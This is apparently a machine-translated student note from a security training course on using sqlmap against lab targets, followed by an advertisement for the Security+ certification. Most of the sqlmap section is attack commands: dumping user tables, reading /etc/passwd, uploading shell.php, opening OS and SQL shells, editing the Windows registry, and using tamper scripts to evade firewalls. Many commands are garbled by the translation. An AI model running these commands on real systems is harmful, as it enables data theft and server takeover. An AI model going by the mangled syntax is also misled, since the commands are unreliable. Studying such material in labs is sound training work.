Pseudo-static pages cannot be injected, this is wrong!
SQLMAP Automatic Injection-----Enumeration
--current-user
--current-db
--hostname
--users
--privileges-u username (cu current account)
--roles
--dbs
--tables,--exclude-sysdbs-d Dvwa
-T user-d dvwa-c user--columns
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--tamper=" tamper/ between.py,tamper/randomcase.py,tamper/space?comment.py "-V 3--current-user
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--tamper=" tamper/ between.py,tamper/randomcase.py,tamper/space?comment.py "-V 3--user
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--tamper=" tamper/ between.py,tamper/randomcase.py,tamper/space?comment.py "-V 3--privileges-u Guest
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--tamper=" tamper/ between.py,tamper/randomcase.py,tamper/space?comment.py "-V 3--roles
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--tamper=" tamper/ between.py,tamper/randomcase.py,tamper/space?comment.py "-V 3--dbs
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--tamper=" tamper/ between.py,tamper/randomcase.py,tamper/space?comment.py "-V dvwa--table
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--tamper=" tamper/ between.py,tamper/randomcase.py,tamper/space?comment.py "-V dvwa-t users--columns
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--tamper=" tamper/ between.py,tamper/randomcase.py,tamper/space?comment.py "-V dvwa-t users--count
SQLMAP Automatic Injection-----Enumeration
--schema--batch--exclude-sysdbs metadata (using default options)
--count
Dump data
--dump,-c,-t,-d,--start,--stop
--dump-all--exclude-sysdbs
--sql-query "SELECT * from Users"
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--tamper=" tamper/ between.py,tamper/randomcase.py,tamper/space?comment.py "-V 3--schema--batch--exclude-sysdbs
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--tamper=" tamper/ between.py,tamper/randomcase.py,tamper/space?comment.py "-V dvwa-t users--dump
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--tamper=" tamper/ between.py,tamper/randomcase.py,tamper/space?comment.py "-V dvwa-t users--dump-all
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--sql-query" SELECT * FROM Users
SQLMAP Automatic injection of-----BRUTE force
mysql<5.0, no Information_schema library.
mysql>=5.0, but not authorized to read the INFORMATION_SCHEMA library
Microsoft Access database, default permission to read Msysobjects library
--common-tables
--common-columns (Access system table has no column information)
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "--common-tables
SQLMAP Automatic injection of-----UDF injection
--udf-inject,--Shared-lib
Compile the shared library to create and upload to DB Server to generate the UDF for advanced injection
Linux:shared Object
Windows:dll
http://www.slideshare.net/inquis/advanced-sql-injection-to-operating-system-
full-control-whitepaper-4633857
SQLMAP Automatic injection-----FILE SYSTEM
--file-read= "/etc/passwd"
--file-write= "shell.php"--file-dest "/tmp/shell.php"
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--file-read="/etc/ passwd
[Email protected]:~# cd/root/.sqlmap/output/192.168.1.115
[Email protected]:/.sqlmap/output/192.168.1.115# ls
Dump Files Log session.sqlite Target.txt
[Email protected]:/.sqlmap/output/192.168.1.115# cd files/
[Email protected]:/.sqlmap/output/192.168.1.115/files# ls
_etc_passwd
[Email protected]:/.sqlmap/output/192.168.1.115/files# cat _ETC_PASSWD
[Email protected]:~# VI shell.php
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--file-write=" shell.php "--file-dest="/tmp/shell.php "
Sqlmap Automatically injects-----OS
Mysql, PostgreSQL
Upload a shared library and generate Sys_exec (), Sys_eval () two UDFs
Mssql
xp_cmdshell stored procedures (with nine, no boot, no keys)
--sql-shell
--os-shell
--os-cmd
Roo[email protected]:~# sqlmap-u "http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1 &password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--os-cmd
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--os-shell
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--sql-shell
SQLMAP Automatic injection-----WINDOWS registory
--reg-read
--reg-add
--reg-del
--reg-key 、--reg-value 、--reg-data 、--reg-type
sqlmap.py-u= "http://1.1.1.1/a.php?id=1--reg-add\--reg-key=" Hkey_local_machine\software\sqlmap "--reg-value=test --reg-type=reg-sz--reg-data=1
SQLMAP Automatic Injection-----General
-s:sqlite Session File Save location
-T: Record where the stray files are saved
--charset: Force character encoding
--charset=gbk
--crawl: Crawl depth from start position
--batch--crawl=3
--csv-del:dump data is stored by default in the "," split CSV file, specifying additional separators
--csv-del= ";"
--dbms-cred: Specify Database Account
SQLMAP Automatic Injection-----General
--flush-session: Empty session
--force-ssl
--fresh-queries: Ignore session query Results
--hex:dump non-ASCII character content, encode it as 16-binary form, receive post-decode restore
Sqlmap-u "Http://1.1.1.1/s.php?id=1"--HEX-V 3
--output-dir=/tmp
--parse-error: Analysis and real-world database built-in error messages
Sqlmap-u "Http://1.1.1.1/sqlmap/a.php?id=1"--parse-errors
--save: Save the command as a configuration file
[Email protected]:~# sqlmap-u] http://192.168.1.115/mutillidae/index.php?page=user-info.php&username=1& Password=2&user-info-php-submit-button=view+account+details "-P" user-agent,username "--dbs--fresh-queries-- Save
SQLMAP Automatic injection of-----Miscellaneous
-Z: Parameter mnemonic
Sqlmap--batch--random-agent--ignore-proxy--technique=beu-u
"1.1.1.1/a.php?id=1"
Sqlmap-z "Bat,randcma,ign,tec=beu"-U "1.1.1.1/a.php?id=1"
Sqlmap-ignore-proxy--flush-session--technique=u--dump-d TestDB-
T user-u "1.1.1.1/a.php?id=1"
Sqlmap-z "Ign,flu,bat,tec=u,dump,d=testdb,t=users"-u
"1.1.1.1/vuln.php?id=1"
SQLMAP Automatic injection of-----Miscellaneous
--answer
Sqlmap-u "Http://1.1.1.1/a.php?id=1"--technique=e--
answers= "Extending=n"--batch
--CHECK-WAF: Detection Waf/ips/ids
--hpp:http parameter pollution
An effective way to bypass Waf/ips/ids
Especially for Asp/iss and Asp.net/iis.
--IDENTIFY-WAF: Thorough waf/ips/ids inspection
Support for more than 30 kinds of products
SQLMAP Automatic injection of-----Miscellaneous
--mobile: Analog Smartphone devices
--purge-output: Clear Output folder
--smart: When there are a large number of detection targets, only error-based detection results are selected
--wizard: Wizard
This note is for safe Cattle class student notes, want to see this course or information security of dry goods can go to safe cattle classes
security+ Certification Why is the Internet + era of the most popular certification?
Manifesto first introduce you to security+
security+ certification is a neutral third-party certification, the issuing agency for the United States Computer Industry Association CompTIA, and CISSP, ITIL and other common inclusion of the international IT Industry 10 Popular certification, and CISSP emphasis on information security management, compared to security+ Authentication is more emphasis on information security technology and operations.
This certification demonstrates your ability to network security, compliance and operational security, threats and vulnerabilities, application, data and Host security, access control and identity management, and encryption technology. Because of its difficult examination difficulty, the gold content is high, has been widely adopted by global enterprises and security professionals.
Why is security+ certification so hot?
Reason one: In all information security certification, the emphasis on information security technology certification is blank, security+ certification just can make up for information security technology field blank.
currently recognized in the industry of information security certification mainly Cisp and CISSP, but whether cisp or CISSP are emphasis on information security management, technical knowledge is broad and simple, the exam is around. And CISSP require a certificate of information security work experience for more than 5 years, Cisp also require a college education 4 years of working experience, these requirements will undoubtedly be able and motivated young people of the road blocked. In the real world, whether it is looking for a job or a raise, or a tender time to report personnel, certification is essential, which brings a lot of injustice to young people. The emergence of security+ can clear these young people career development obstacles, because security+ emphasis on information security technology, so there is no special requirements for work experience. As long as you have an IT-related background, the pursuit of progress can be studied and tested.
Reason two: it operation and maintenance personnel work and turn over the weapon.
in the banking, securities, insurance, information and communications industries, IT operations personnel are very many, it operations involved in the face is also very wide. is a network, system, security, application architecture, storage as one integrated technology post. Although no program ape "born as a Bachelor, Die also write code," The solemn and tragic, but also has "Hoe wo Day Copse, as the operation of suffering" feeling. Every day to the computer and machine, the time has been inevitable for career development confusion and confusion. The advent of security+ international certification allows the pursuit of IT operations personnel to learn network security knowledge, to master network security practices. Career development in the direction of network security, to solve the problem of the shortage of information security personnel in China. In addition, even if not transformation, to do a good job in operation and maintenance, learning safety knowledge to obtain safety certification is also essential.
reason three: grounding gas, international stylish, easy examination, moderate cost!
comptia is professional, fair and impartial in the field of information security talent certification. Security+ certification is highly operational and closely related to the daily work of frontline engineers. Suitable for banks, securities, insurance, internet companies and other IT-related personnel learning. As an international certification in 147 countries around the world are widely recognized.
Under the current tide of information security, talent is the key to the development of information security. and the current domestic information security personnel is very scarce, I believe security+ certification will become the most popular information security certification.
"Safe Cow Learning Note" Sqlmap automatically injects-enumeration, BRUTE Force, UDF in